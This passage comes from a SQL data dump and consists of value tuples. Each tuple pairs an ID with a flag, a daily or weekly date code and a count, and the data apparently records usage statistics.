),(4893,0,'20260619',1),(4897,0,'20260619',1),(4977,0,'20260619',1),(4996,0,'20260619',1),(5024,0,'20260619',1),(5042,0,'20260619',1),(5046,0,'20260619',1),(5058,0,'20260619',1),(5071,0,'20260619',1),(5125,0,'20260619',1),(5134,0,'20260619',1),(5140,0,'20260619',1),(5146,0,'20260619',1),(5157,0,'20260619',1),(5253,0,'20260619',1),(5280,0,'20260619',1),(5289,0,'20260619',1),(5301,0,'20260619',1),(5307,0,'20260619',1),(5310,0,'20260619',1),(5314,0,'20260619',1),(5334,0,'20260619',1),(5356,0,'20260619',1),(5374,0,'20260619',1),(5378,0,'20260619',1),(5420,0,'20260619',1),(5433,0,'20260619',1),(5441,0,'20260619',1),(5461,0,'20260619',1),(5464,0,'20260619',1),(5492,0,'20260619',1),(5512,0,'20260619',1),(5561,0,'20260619',1),(5570,0,'20260619',1),(5578,0,'20260619',1),(5593,0,'20260619',1),(5601,0,'20260619',1),(5605,0,'20260619',1),(5609,0,'20260619',1),(5636,0,'20260619',1),(5662,0,'20260619',1),(5674,0,'20260619',1),(5700,0,'20260619',1),(5738,0,'20260619',1),(5816,0,'20260619',1),(5824,0,'20260619',1),(5828,0,'20260619',1),(5844,0,'20260619',1),(5868,0,'20260619',1),(5945,0,'20260619',1),(84,0,'20260619',2),(467,0,'20260619',2),(473,0,'20260619',2),(474,0,'20260619',2),(480,0,'20260619',2),(483,0,'20260619',2),(1586,0,'20260619',2),(1596,0,'20260619',2),(1600,0,'20260619',2),(1610,0,'20260619',2),(1612,0,'20260619',2),(1614,0,'20260619',2),(1705,0,'20260619',2),(1715,0,'20260619',2),(1720,0,'20260619',2),(1734,0,'20260619',2),(1743,0,'20260619',2),(1776,0,'20260619',2),(1780,0,'20260619',2),(2150,0,'20260619',2),(2457,0,'20260619',2),(2704,0,'20260619',2),(2964,0,'20260619',2),(2989,0,'20260619',2),(3005,0,'20260619',2),(3027,0,'20260619',2),(3041,0,'20260619',2),(3066,0,'20260619',2),(3087,0,'20260619',2),(3102,0,'20260619',2),(3124,0,'20260619',2),(3240,0,'20260619',2),(3261,0,'20260619',2),(3271,0,'20260619',2),(3280,0,'20260619',2),(3290,0,'20260619',2),(3486,0,'20260619',2),(3727,0,'20260619',2),(3749,0,'20260619',2),(3764,0,'20260619',2),(3774,0,'20260619',2),(4338,0,'20260619',2),(4382,0,'20260619',2),(4396,0,'20260619',2),(4428,0,'20260619',2),(4454,0,'20260619',2),(4457,0,'20260619',2),(4529,0,'20260619',2),(4551,0,'20260619',2),(4591,0,'20260619',2),(4677,0,'20260619',2),(4694,0,'20260619',2),(4700,0,'20260619',2),(4709,0,'20260619',2),(4753,0,'20260619',2),(4776,0,'20260619',2),(4888,0,'20260619',2),(4980,0,'20260619',2),(4988,0,'20260619',2),(5101,0,'20260619',2),(5122,0,'20260619',2),(5264,0,'20260619',2),(5292,0,'20260619',2),(5359,0,'20260619',2),(5363,0,'20260619',2),(5400,0,'20260619',2),(5409,0,'20260619',2),(5472,0,'20260619',2),(5489,0,'20260619',2),(5515,0,'20260619',2),(5696,0,'20260619',2),(5771,0,'20260619',2),(5785,0,'20260619',2),(5833,0,'20260619',2),(5865,0,'20260619',2),(5875,0,'20260619',2),(5881,0,'20260619',2),(5902,0,'20260619',2),(5910,0,'20260619',2),(5917,0,'20260619',2),(5921,0,'20260619',2),(87,0,'20260619',3),(110,0,'20260619',3),(487,0,'20260619',3),(1582,0,'20260619',3),(1590,0,'20260619',3),(1703,0,'20260619',3),(1728,0,'20260619',3),(2152,0,'20260619',3),(2297,0,'20260619',3),(2617,0,'20260619',3),(2769,0,'20260619',3),(2804,0,'20260619',3),(2813,0,'20260619',3),(3069,0,'20260619',3),(3083,0,'20260619',3),(3096,0,'20260619',3),(3285,0,'20260619',3),(4357,0,'20260619',3),(4373,0,'20260619',3),(4432,0,'20260619',3),(4542,0,'20260619',3),(4582,0,'20260619',3),(4660,0,'20260619',3),(4668,0,'20260619',3),(4703,0,'20260619',3),(4712,0,'20260619',3),(4747,0,'20260619',3),(4930,0,'20260619',3),(5153,0,'20260619',3),(5259,0,'20260619',3),(5276,0,'20260619',3),(5304,0,'20260619',3),(5449,0,'20260619',3),(5467,0,'20260619',3),(5567,0,'20260619',3),(5735,0,'20260619',3),(5762,0,'20260619',3),(5778,0,'20260619',3),(5821,0,'20260619',3),(5847,0,'20260619',3),(5878,0,'20260619',3),(5884,0,'20260619',3),(5930,0,'20260619',3),(5961,0,'20260619',3),(335,0,'20260619',4),(468,0,'20260619',4),(469,0,'20260619',4),(1544,0,'20260619',4),(1606,0,'20260619',4),(2503,0,'20260619',4),(3253,0,'20260619',4),(3263,0,'20260619',4),(4420,0,'20260619',4),(4706,0,'20260619',4),(4722,0,'20260619',4),(5317,0,'20260619',4),(5406,0,'20260619',4),(5906,0,'20260619',4),(5967,0,'20260619',4),(1588,0,'20260619',5),(1594,0,'20260619',5),(3004,0,'20260619',5),(4566,0,'20260619',5),(5436,0,'20260619',5),(5457,0,'20260619',5),(5925,0,'20260619',5),(5964,0,'20260619',5),(5975,0,'20260619',5),(1584,0,'20260619',6),(1778,0,'20260619',6),(5076,0,'20260619',6),(5415,0,'20260619',6),(5769,0,'20260619',6),(89,0,'20260619',7),(2904,0,'20260619',7),(74,0,'20260619',8),(1602,0,'20260619',8),(5859,0,'20260619',8),(76,0,'20260619',9),(5397,0,'20260619',9),(3781,0,'20260619',11),(91,0,'20260619',13),(5986,0,'20260619',13),(72,0,'20260619',16),(1747,0,'20260619',16),(80,0,'20260619',20),(9,0,'20260619',1010),(110,0,'20260620',1),(467,0,'20260620',1),(479,0,'20260620',1),(481,0,'20260620',1),(483,0,'20260620',1),(485,0,'20260620',1),(570,0,'20260620',1),(1590,0,'20260620',1),(1592,0,'20260620',1),(1600,0,'20260620',1),(1602,0,'20260620',1),(1610,0,'20260620',1),(1612,0,'20260620',1),(1695,0,'20260620',1),(1699,0,'20260620',1),(1703,0,'20260620',1),(1707,0,'20260620',1),(1709,0,'20260620',1),(1711,0,'20260620',1),(1720,0,'20260620',1),(1734,0,'20260620',1),(1739,0,'20260620',1),(1751,0,'20260620',1),(1766,0,'20260620',1),(1774,0,'20260620',1),(1776,0,'20260620',1),(1780,0,'20260620',1),(2063,0,'20260620',1),(2159,0,'20260620',1),(2165,0,'20260620',1),(2248,0,'20260620',1),(2293,0,'20260620',1),(2704,0,'20260620',1),(2748,0,'20260620',1),(2769,0,'20260620',1),(2775,0,'20260620',1),(2801,0,'20260620',1),(2911,0,'20260620',1),(2956,0,'20260620',1),(2964,0,'20260620',1),(2965,0,'20260620',1),(2991,0,'20260620',1),(3006,0,'20260620',1),(3034,0,'20260620',1),(3060,0,'20260620',1),(3063,0,'20260620',1),(3072,0,'20260620',1),(3083,0,'20260620',1),(3090,0,'20260620',1),(3092,0,'20260620',1),(3096,0,'20260620',1),(3097,0,'20260620',1),(3102,0,'20260620',1),(3107,0,'20260620',1),(3247,0,'20260620',1),(3253,0,'20260620',1),(3271,0,'20260620',1),(3280,0,'20260620',1),(3282,0,'20260620',1),(3313,0,'20260620',1),(3316,0,'20260620',1),(3430,0,'20260620',1),(3479,0,'20260620',1),(3531,0,'20260620',1),(3721,0,'20260620',1),(3731,0,'20260620',1),(3742,0,'20260620',1),(3752,0,'20260620',1),(3771,0,'20260620',1),(3774,0,'20260620',1),(3777,0,'20260620',1),(3781,0,'20260620',1),(4323,0,'20260620',1),(4332,0,'20260620',1),(4338,0,'20260620',1),(4363,0,'20260620',1),(4382,0,'20260620',1),(4387,0,'20260620',1),(4391,0,'20260620',1),(4400,0,'20260620',1),(4416,0,'20260620',1),(4432,0,'20260620',1),(4448,0,'20260620',1),(4454,0,'20260620',1),(4517,0,'20260620',1),(4551,0,'20260620',1),(4556,0,'20260620',1),(4582,0,'20260620',1),(4612,0,'20260620',1),(4654,0,'20260620',1),(4660,0,'20260620',1),(4663,0,'20260620',1),(4668,0,'20260620',1),(4674,0,'20260620',1),(4677,0,'20260620',1),(4685,0,'20260620',1),(4688,0,'20260620',1),(4691,0,'20260620',1),(4694,0,'20260620',1),(4700,0,'20260620',1),(4744,0,'20260620',1),(4747,0,'20260620',1),(4750,0,'20260620',1),(4753,0,'20260620',1),(4756,0,'20260620',1),(4768,0,'20260620',1),(4866,0,'20260620',1),(4897,0,'20260620',1),(4977,0,'20260620',1),(5020,0,'20260620',1),(5024,0,'20260620',1),(5037,0,'20260620',1),(5042,0,'20260620',1),(5050,0,'20260620',1),(5071,0,'20260620',1),(5101,0,'20260620',1),(5122,0,'20260620',1),(5134,0,'20260620',1),(5137,0,'20260620',1),(5153,0,'20260620',1),(5157,0,'20260620',1),(5163,0,'20260620',1),(5256,0,'20260620',1),(5268,0,'20260620',1),(5276,0,'20260620',1),(5280,0,'20260620',1),(5292,0,'20260620',1),(5334,0,'20260620',1),(5359,0,'20260620',1),(5409,0,'20260620',1),(5412,0,'20260620',1),(5420,0,'20260620',1),(5433,0,'20260620',1),(5454,0,'20260620',1),(5461,0,'20260620',1),(5492,0,'20260620',1),(5502,0,'20260620',1),(5512,0,'20260620',1),(5567,0,'20260620',1),(5593,0,'20260620',1),(5598,0,'20260620',1),(5601,0,'20260620',1),(5626,0,'20260620',1),(5636,0,'20260620',1),(5666,0,'20260620',1),(5674,0,'20260620',1),(5696,0,'20260620',1),(5738,0,'20260620',1),(5762,0,'20260620',1),(5816,0,'20260620',1),(5844,0,'20260620',1),(5865,0,'20260620',1),(5872,0,'20260620',1),(5878,0,'20260620',1),(5881,0,'20260620',1),(5884,0,'20260620',1),(5906,0,'20260620',1),(476,0,'20260620',2),(1584,0,'20260620',2),(1588,0,'20260620',2),(1594,0,'20260620',2),(1596,0,'20260620',2),(1598,0,'20260620',2),(1606,0,'20260620',2),(1608,0,'20260620',2),(1697,0,'20260620',2),(1701,0,'20260620',2),(1715,0,'20260620',2),(1718,0,'20260620',2),(1722,0,'20260620',2),(1724,0,'20260620',2),(1726,0,'20260620',2),(1728,0,'20260620',2),(1732,0,'20260620',2),(1768,0,'20260620',2),(1770,0,'20260620',2),(1782,0,'20260620',2),(2150,0,'20260620',2),(2154,0,'20260620',2),(2296,0,'20260620',2),(2751,0,'20260620',2),(3023,0,'20260620',2),(3038,0,'20260620',2),(3045,0,'20260620',2),(3066,0,'20260620',2),(3226,0,'20260620',2),(3229,0,'20260620',2),(3243,0,'20260620',2),(3245,0,'20260620',2),(3251,0,'20260620',2),(3259,0,'20260620',2),(3263,0,'20260620',2),(3265,0,'20260620',2),(3269,0,'20260620',2),(3297,0,'20260620',2),(3307,0,'20260620',2),(3482,0,'20260620',2),(3489,0,'20260620',2),(3498,0,'20260620',2),(3714,0,'20260620',2),(3724,0,'20260620',2),(4275,0,'20260620',2),(4341,0,'20260620',2),(4368,0,'20260620',2),(4404,0,'20260620',2),(4424,0,'20260620',2),(4428,0,'20260620',2),(4436,0,'20260620',2),(4440,0,'20260620',2),(4457,0,'20260620',2),(4524,0,'20260620',2),(4542,0,'20260620',2),(4546,0,'20260620',2),(4651,0,'20260620',2),(4657,0,'20260620',2),(4681,0,'20260620',2),(4706,0,'20260620',2),(4709,0,'20260620',2),(4722,0,'20260620',2),(4870,0,'20260620',2),(4983,0,'20260620',2),(4988,0,'20260620',2),(5033,0,'20260620',2),(5062,0,'20260620',2),(5076,0,'20260620',2),(5125,0,'20260620',2),(5128,0,'20260620',2),(5248,0,'20260620',2),(5253,0,'20260620',2),(5259,0,'20260620',2),(5264,0,'20260620',2),(5289,0,'20260620',2),(5295,0,'20260620',2),(5298,0,'20260620',2),(5304,0,'20260620',2),(5307,0,'20260620',2),(5323,0,'20260620',2),(5330,0,'20260620',2),(5353,0,'20260620',2),(5374,0,'20260620',2),(5415,0,'20260620',2),(5436,0,'20260620',2),(5464,0,'20260620',2),(5467,0,'20260620',2),(5489,0,'20260620',2),(5609,0,'20260620',2),(5735,0,'20260620',2),(5771,0,'20260620',2),(5785,0,'20260620',2),(5821,0,'20260620',2),(5828,0,'20260620',2),(5833,0,'20260620',2),(5910,0,'20260620',2),(74,0,'20260620',3),(473,0,'20260620',3),(1604,0,'20260620',3),(1713,0,'20260620',3),(1737,0,'20260620',3),(1741,0,'20260620',3),(1778,0,'20260620',3),(2148,0,'20260620',3),(2178,0,'20260620',3),(2309,0,'20260620',3),(2457,0,'20260620',3),(2609,0,'20260620',3),(2989,0,'20260620',3),(3005,0,'20260620',3),(3027,0,'20260620',3),(3104,0,'20260620',3),(3249,0,'20260620',3),(3267,0,'20260620',3),(3273,0,'20260620',3),(3275,0,'20260620',3),(3438,0,'20260620',3),(3486,0,'20260620',3),(3541,0,'20260620',3),(3710,0,'20260620',3),(4238,0,'20260620',3),(4301,0,'20260620',3),(4377,0,'20260620',3),(4444,0,'20260620',3),(4608,0,'20260620',3),(4712,0,'20260620',3),(4762,0,'20260620',3),(4874,0,'20260620',3),(4878,0,'20260620',3),(4883,0,'20260620',3),(4996,0,'20260620',3),(5146,0,'20260620',3),(5326,0,'20260620',3),(5363,0,'20260620',3),(5378,0,'20260620',3),(5383,0,'20260620',3),(5700,0,'20260620',3),(5847,0,'20260620',3),(5889,0,'20260620',3),(5902,0,'20260620',3),(5921,0,'20260620',3),(5945,0,'20260620',3),(5961,0,'20260620',3),(335,0,'20260620',4),(471,0,'20260620',4),(474,0,'20260620',4),(1544,0,'20260620',4),(1614,0,'20260620',4),(2152,0,'20260620',4),(2161,0,'20260620',4),(2503,0,'20260620',4),(2813,0,'20260620',4),(3109,0,'20260620',4),(3240,0,'20260620',4),(4420,0,'20260620',4),(4888,0,'20260620',4),(4930,0,'20260620',4),(5457,0,'20260620',4),(5769,0,'20260620',4),(5859,0,'20260620',4),(5875,0,'20260620',4),(5917,0,'20260620',4),(5964,0,'20260620',4),(5967,0,'20260620',4),(76,0,'20260620',5),(102,0,'20260620',5),(108,0,'20260620',5),(472,0,'20260620',5),(1582,0,'20260620',5),(2904,0,'20260620',5),(4373,0,'20260620',5),(5397,0,'20260620',5),(5778,0,'20260620',5),(5824,0,'20260620',5),(5925,0,'20260620',5),(469,0,'20260620',6),(470,0,'20260620',6),(5975,0,'20260620',6),(84,0,'20260620',7),(87,0,'20260620',7),(468,0,'20260620',7),(487,0,'20260620',7),(1586,0,'20260620',7),(89,0,'20260620',8),(72,0,'20260620',9),(5986,0,'20260620',10),(80,0,'20260620',13),(91,0,'20260620',15),(9,0,'20260620',551),(106,0,'20260621',1),(467,0,'20260621',1),(478,0,'20260621',1),(479,0,'20260621',1),(481,0,'20260621',1),(482,0,'20260621',1),(485,0,'20260621',1),(486,0,'20260621',1),(487,0,'20260621',1),(488,0,'20260621',1),(1544,0,'20260621',1),(1588,0,'20260621',1),(1596,0,'20260621',1),(1606,0,'20260621',1),(1720,0,'20260621',1),(1722,0,'20260621',1),(1726,0,'20260621',1),(1730,0,'20260621',1),(1734,0,'20260621',1),(1737,0,'20260621',1),(1739,0,'20260621',1),(1743,0,'20260621',1),(1751,0,'20260621',1),(1766,0,'20260621',1),(1778,0,'20260621',1),(1782,0,'20260621',1),(2152,0,'20260621',1),(2156,0,'20260621',1),(2165,0,'20260621',1),(2252,0,'20260621',1),(2558,0,'20260621',1),(2609,0,'20260621',1),(2801,0,'20260621',1),(2809,0,'20260621',1),(2965,0,'20260621',1),(2993,0,'20260621',1),(3023,0,'20260621',1),(3034,0,'20260621',1),(3038,0,'20260621',1),(3096,0,'20260621',1),(3097,0,'20260621',1),(3104,0,'20260621',1),(3107,0,'20260621',1),(3117,0,'20260621',1),(3226,0,'20260621',1),(3240,0,'20260621',1),(3243,0,'20260621',1),(3251,0,'20260621',1),(3287,0,'20260621',1),(3534,0,'20260621',1),(3714,0,'20260621',1),(3727,0,'20260621',1),(3742,0,'20260621',1),(3771,0,'20260621',1),(3774,0,'20260621',1),(3777,0,'20260621',1),(4238,0,'20260621',1),(4275,0,'20260621',1),(4363,0,'20260621',1),(4368,0,'20260621',1),(4373,0,'20260621',1),(4377,0,'20260621',1),(4416,0,'20260621',1),(4420,0,'20260621',1),(4436,0,'20260621',1),(4448,0,'20260621',1),(4587,0,'20260621',1),(4612,0,'20260621',1),(4645,0,'20260621',1),(4668,0,'20260621',1),(4694,0,'20260621',1),(4697,0,'20260621',1),(4700,0,'20260621',1),(4709,0,'20260621',1),(4741,0,'20260621',1),(4747,0,'20260621',1),(4753,0,'20260621',1),(4797,0,'20260621',1),(4870,0,'20260621',1),(4883,0,'20260621',1),(4897,0,'20260621',1),(4996,0,'20260621',1),(5037,0,'20260621',1),(5046,0,'20260621',1),(5050,0,'20260621',1),(5128,0,'20260621',1),(5131,0,'20260621',1),(5134,0,'20260621',1),(5140,0,'20260621',1),(5146,0,'20260621',1),(5157,0,'20260621',1),(5253,0,'20260621',1),(5259,0,'20260621',1),(5264,0,'20260621',1),(5271,0,'20260621',1),(5276,0,'20260621',1),(5292,0,'20260621',1),(5298,0,'20260621',1),(5301,0,'20260621',1),(5304,0,'20260621',1),(5310,0,'20260621',1),(5320,0,'20260621',1),(5323,0,'20260621',1),(5359,0,'20260621',1),(5383,0,'20260621',1),(5409,0,'20260621',1),(5412,0,'20260621',1),(5415,0,'20260621',1),(5425,0,'20260621',1),(5464,0,'20260621',1),(5467,0,'20260621',1),(5472,0,'20260621',1),(5489,0,'20260621',1),(5567,0,'20260621',1),(5582,0,'20260621',1),(5593,0,'20260621',1),(5601,0,'20260621',1),(5605,0,'20260621',1),(5626,0,'20260621',1),(5666,0,'20260621',1),(5674,0,'20260621',1),(5762,0,'20260621',1),(5778,0,'20260621',1),(5821,0,'20260621',1),(5847,0,'20260621',1),(5859,0,'20260621',1),(5925,0,'20260621',1),(5930,0,'20260621',1),(110,0,'20260621',2),(470,0,'20260621',2),(472,0,'20260621',2),(477,0,'20260621',2),(1582,0,'20260621',2),(1584,0,'20260621',2),(1602,0,'20260621',2),(1604,0,'20260621',2),(1614,0,'20260621',2),(1697,0,'20260621',2),(1703,0,'20260621',2),(1724,0,'20260621',2),(1741,0,'20260621',2),(2148,0,'20260621',2),(2150,0,'20260621',2),(2748,0,'20260621',2),(2813,0,'20260621',2),(2911,0,'20260621',2),(2964,0,'20260621',2),(2991,0,'20260621',2),(3030,0,'20260621',2),(3063,0,'20260621',2),(3124,0,'20260621',2),(3247,0,'20260621',2),(3253,0,'20260621',2),(3307,0,'20260621',2),(3479,0,'20260621',2),(3541,0,'20260621',2),(3731,0,'20260621',2),(4301,0,'20260621',2),(4335,0,'20260621',2),(4400,0,'20260621',2),(4412,0,'20260621',2),(4529,0,'20260621',2),(4546,0,'20260621',2),(4551,0,'20260621',2),(4608,0,'20260621',2),(4657,0,'20260621',2),(4660,0,'20260621',2),(4663,0,'20260621',2),(4674,0,'20260621',2),(4681,0,'20260621',2),(4744,0,'20260621',2),(4750,0,'20260621',2),(4765,0,'20260621',2),(4768,0,'20260621',2),(4802,0,'20260621',2),(5101,0,'20260621',2),(5125,0,'20260621',2),(5295,0,'20260621',2),(5330,0,'20260621',2),(5363,0,'20260621',2),(5397,0,'20260621',2),(5433,0,'20260621',2),(5636,0,'20260621',2),(5683,0,'20260621',2),(5700,0,'20260621',2),(5735,0,'20260621',2),(5769,0,'20260621',2),(5771,0,'20260621',2),(5816,0,'20260621',2),(5868,0,'20260621',2),(5875,0,'20260621',2),(5902,0,'20260621',2),(5906,0,'20260621',2),(5921,0,'20260621',2),(76,0,'20260621',3),(102,0,'20260621',3),(473,0,'20260621',3),(474,0,'20260621',3),(1586,0,'20260621',3),(1594,0,'20260621',3),(1701,0,'20260621',3),(1705,0,'20260621',3),(1707,0,'20260621',3),(1728,0,'20260621',3),(2159,0,'20260621',3),(2309,0,'20260621',3),(2769,0,'20260621',3),(3004,0,'20260621',3),(3005,0,'20260621',3),(3006,0,'20260621',3),(3083,0,'20260621',3),(3313,0,'20260621',3),(3316,0,'20260621',3),(3438,0,'20260621',3),(3498,0,'20260621',3),(4440,0,'20260621',3),(4457,0,'20260621',3),(4566,0,'20260621',3),(4654,0,'20260621',3),(4703,0,'20260621',3),(4756,0,'20260621',3),(4771,0,'20260621',3),(5033,0,'20260621',3),(5137,0,'20260621',3),(5153,0,'20260621',3),(5256,0,'20260621',3),(5280,0,'20260621',3),(5289,0,'20260621',3),(5356,0,'20260621',3),(5378,0,'20260621',3),(5492,0,'20260621',3),(5738,0,'20260621',3),(5878,0,'20260621',3),(5881,0,'20260621',3),(5884,0,'20260621',3),(5889,0,'20260621',3),(5945,0,'20260621',3),(1592,0,'20260621',4),(1608,0,'20260621',4),(1699,0,'20260621',4),(1772,0,'20260621',4),(2178,0,'20260621',4),(3430,0,'20260621',4),(3781,0,'20260621',4),(5076,0,'20260621',4),(5326,0,'20260621',4),(5454,0,'20260621',4),(5824,0,'20260621',4),(5828,0,'20260621',4),(5833,0,'20260621',4),(5872,0,'20260621',4),(5910,0,'20260621',4),(5961,0,'20260621',4),(5964,0,'20260621',4),(108,0,'20260621',5),(468,0,'20260621',5),(2503,0,'20260621',5),(5436,0,'20260621',5),(5967,0,'20260621',5),(74,0,'20260621',6),(335,0,'20260621',6),(2904,0,'20260621',6),(3060,0,'20260621',6),(4930,0,'20260621',6),(5457,0,'20260621',6),(5975,0,'20260621',6),(84,0,'20260621',7),(87,0,'20260621',7),(570,0,'20260621',7),(80,0,'20260621',9),(91,0,'20260621',11),(5986,0,'20260621',11),(3102,0,'20260621',14),(72,0,'20260621',15),(89,0,'20260621',15),(9,0,'20260621',562),(74,0,'20260622',1),(80,0,'20260622',1),(84,0,'20260622',1),(91,0,'20260622',1),(106,0,'20260622',1),(108,0,'20260622',1),(335,0,'20260622',1),(468,0,'20260622',1),(469,0,'20260622',1),(476,0,'20260622',1),(480,0,'20260622',1),(483,0,'20260622',1),(484,0,'20260622',1),(485,0,'20260622',1),(1588,0,'20260622',1),(1596,0,'20260622',1),(1600,0,'20260622',1),(1604,0,'20260622',1),(1711,0,'20260622',1),(1724,0,'20260622',1),(1739,0,'20260622',1),(1778,0,'20260622',1),(1782,0,'20260622',1),(2063,0,'20260622',1),(2252,0,'20260622',1),(2503,0,'20260622',1),(2965,0,'20260622',1),(3004,0,'20260622',1),(3006,0,'20260622',1),(3034,0,'20260622',1),(3038,0,'20260622',1),(3060,0,'20260622',1),(3069,0,'20260622',1),(3072,0,'20260622',1),(3090,0,'20260622',1),(3117,0,'20260622',1),(3297,0,'20260622',1),(3531,0,'20260622',1),(3764,0,'20260622',1),(3777,0,'20260622',1),(4323,0,'20260622',1),(4357,0,'20260622',1),(4382,0,'20260622',1),(4514,0,'20260622',1),(4524,0,'20260622',1),(4660,0,'20260622',1),(4712,0,'20260622',1),(4741,0,'20260622',1),(4747,0,'20260622',1),(4976,0,'20260622',1),(5037,0,'20260622',1),(5071,0,'20260622',1),(5076,0,'20260622',1),(5256,0,'20260622',1),(5295,0,'20260622',1),(5298,0,'20260622',1),(5304,0,'20260622',1),(5310,0,'20260622',1),(5320,0,'20260622',1),(5334,0,'20260622',1),(5353,0,'20260622',1),(5374,0,'20260622',1),(5409,0,'20260622',1),(5425,0,'20260622',1),(5433,0,'20260622',1),(5436,0,'20260622',1),(5449,0,'20260622',1),(5454,0,'20260622',1),(5561,0,'20260622',1),(5582,0,'20260622',1),(5696,0,'20260622',1),(5735,0,'20260622',1),(5778,0,'20260622',1),(5785,0,'20260622',1),(5821,0,'20260622',1),(5828,0,'20260622',1),(5844,0,'20260622',1),(5865,0,'20260622',1),(5875,0,'20260622',1),(5878,0,'20260622',1),(5884,0,'20260622',1),(5902,0,'20260622',1),(5917,0,'20260622',1),(5925,0,'20260622',1),(5964,0,'20260622',1),(5967,0,'20260622',1),(76,0,'20260622',2),(87,0,'20260622',2),(470,0,'20260622',2),(473,0,'20260622',2),(487,0,'20260622',2),(1584,0,'20260622',2),(1594,0,'20260622',2),(1598,0,'20260622',2),(1602,0,'20260622',2),(4329,0,'20260622',2),(4608,0,'20260622',2),(4930,0,'20260622',2),(5054,0,'20260622',2),(5605,0,'20260622',2),(5662,0,'20260622',2),(5910,0,'20260622',2),(5930,0,'20260622',2),(5975,0,'20260622',2),(5986,0,'20260622',2),(72,0,'20260622',3),(2558,0,'20260622',3),(5585,0,'20260622',3),(5738,0,'20260622',3),(5906,0,'20260622',3),(5945,0,'20260622',3),(5961,0,'20260622',3),(89,0,'20260622',4),(2904,0,'20260622',5),(5593,0,'20260622',5),(5881,0,'20260622',5),(474,0,'20260622',6),(9,0,'20260622',165),(483,1,'201901',1),(488,1,'201901',1),(1598,1,'201901',1),(1614,1,'201901',1),(1697,1,'201901',1),(1718,1,'201901',1),(1747,1,'201901',1),(1776,1,'201901',1),(1780,1,'201901',1),(2178,1,'201901',1),(2309,1,'201901',1),(2911,1,'201901',1),(2609,1,'201901',2),(2751,1,'201901',2),(2813,1,'201901',2),(2804,1,'201901',3),(2658,1,'201901',4),(1582,1,'201948',1),(2704,1,'201948',1),(2801,1,'201948',1),(2813,1,'201948',1),(1598,1,'201948',8),(473,1,'201949',1),(1544,1,'201949',1),(1582,1,'201949',1),(1584,1,'201949',1),(1594,1,'201949',1),(1709,1,'201949',1),(2457,1,'201949',1),(2751,1,'201949',1),(474,1,'201950',1),(478,1,'201950',1),(480,1,'201950',1),(570,1,'201950',1),(1602,1,'201950',1),(1695,1,'201950',1),(2248,1,'201950',1),(2252,1,'201950',1),(2293,1,'201950',1),(2296,1,'201950',1),(2297,1,'201950',1),(2457,1,'201950',1),(2558,1,'201950',1),(2617,1,'201950',1),(482,1,'201950',2),(2748,1,'201950',2),(2775,1,'201950',2),(2801,1,'201950',2),(2813,1,'201950',2),(477,1,'201950',3),(2769,1,'201950',3),(2809,1,'201950',4),(2911,1,'201950',5),(2658,1,'201950',6),(2751,1,'201950',6),(2609,1,'201950',7),(2804,1,'201950',10),(2309,1,'201950',11),(468,1,'201951',1),(477,1,'201951',1),(478,1,'201951',1),(483,1,'201951',1),(484,1,'201951',1),(485,1,'201951',1),(488,1,'201951',1),(1544,1,'201951',1),(1586,1,'201951',1),(1590,1,'201951',1),(1594,1,'201951',1),(1602,1,'201951',1),(1606,1,'201951',1),(1697,1,'201951',1),(1703,1,'201951',1),(1707,1,'201951',1),(1709,1,'201951',1),(1713,1,'201951',1),(1720,1,'201951',1),(1726,1,'201951',1),(1737,1,'201951',1),(1745,1,'201951',1),(1747,1,'201951',1),(1751,1,'201951',1),(1774,1,'201951',1),(1776,1,'201951',1),(1780,1,'201951',1),(2150,1,'201951',1),(2156,1,'201951',1),(2159,1,'201951',1),(2165,1,'201951',1),(2248,1,'201951',1),(2252,1,'201951',1),(2293,1,'201951',1),(2296,1,'201951',1),(2297,1,'201951',1),(2457,1,'201951',1),(2775,1,'201951',1),(2809,1,'201951',1),(2813,1,'201951',1),(467,1,'201951',2),(469,1,'201951',2),(470,1,'201951',2),(471,1,'201951',2),(474,1,'201951',2),(486,1,'201951',2),(487,1,'201951',2),(1582,1,'201951',2),(1588,1,'201951',2),(1598,1,'201951',2),(1614,1,'201951',2),(1699,1,'201951',2),(1701,1,'201951',2),(1743,1,'201951',2),(1749,1,'201951',2),(1766,1,'201951',2),(1768,1,'201951',2),(2178,1,'201951',2),(2704,1,'201951',2),(2769,1,'201951',2),(2911,1,'201951',2),(1600,1,'201951',3),(1612,1,'201951',3),(473,1,'201951',5),(2804,1,'201951',6),(2658,1,'201951',7),(2801,1,'201951',7),(2751,1,'201951',10),(2309,1,'201951',12),(2609,1,'201951',14),(468,1,'201952',1),(470,1,'201952',1),(486,1,'201952',1),(487,1,'201952',1),(1586,1,'201952',1),(1608,1,'201952',1),(1701,1,'201952',1),(1703,1,'201952',1),(1707,1,'201952',1),(1711,1,'201952',1),(1718,1,'201952',1),(1728,1,'201952',1),(1743,1,'201952',1),(1745,1,'201952',1),(1747,1,'201952',1),(1749,1,'201952',1),(1751,1,'201952',1),(1772,1,'201952',1),(1782,1,'201952',1),(2150,1,'201952',1),(2154,1,'201952',1),(2156,1,'201952',1),(2165,1,'201952',1),(2252,1,'201952',1),(2293,1,'201952',1),(2809,1,'201952',1),(1697,1,'201952',2),(1720,1,'201952',2),(1778,1,'201952',2),(2152,1,'201952',2),(2159,1,'201952',2),(2911,1,'201952',2),(473,1,'201952',3),(1699,1,'201952',3),(1768,1,'201952',3),(1776,1,'201952',3),(2178,1,'201952',3),(2297,1,'201952',3),(2309,1,'201952',3),(2609,1,'201952',3),(474,1,'201952',4),(1730,1,'201952',4),(2148,1,'201952',4),(2248,1,'201952',5),(2775,1,'201952',5),(2804,1,'201952',6),(1713,1,'201952',7),(2658,1,'201952',8),(2801,1,'201952',10),(2751,1,'201952',11),(469,1,'202001',1),(472,1,'202001',1),(473,1,'202001',1),(474,1,'202001',1),(476,1,'202001',1),(477,1,'202001',1),(479,1,'202001',1),(481,1,'202001',1),(483,1,'202001',1),(485,1,'202001',1),(488,1,'202001',1),(570,1,'202001',1),(1584,1,'202001',1),(1586,1,'202001',1),(1590,1,'202001',1),(1598,1,'202001',1),(1600,1,'202001',1),(1602,1,'202001',1),(1608,1,'202001',1),(1612,1,'202001',1),(1697,1,'202001',1),(1703,1,'202001',1),(1707,1,'202001',1),(1709,1,'202001',1),(1711,1,'202001',1),(1715,1,'202001',1),(1718,1,'202001',1),(1724,1,'202001',1),(1728,1,'202001',1),(1732,1,'202001',1),(1734,1,'202001',1),(1739,1,'202001',1),(1743,1,'202001',1),(1745,1,'202001',1),(1751,1,'202001',1),(1768,1,'202001',1),(1770,1,'202001',1),(1774,1,'202001',1),(1776,1,'202001',1),(1778,1,'202001',1),(1780,1,'202001',1),(1782,1,'202001',1),(2063,1,'202001',1),(2148,1,'202001',1),(2159,1,'202001',1),(2161,1,'202001'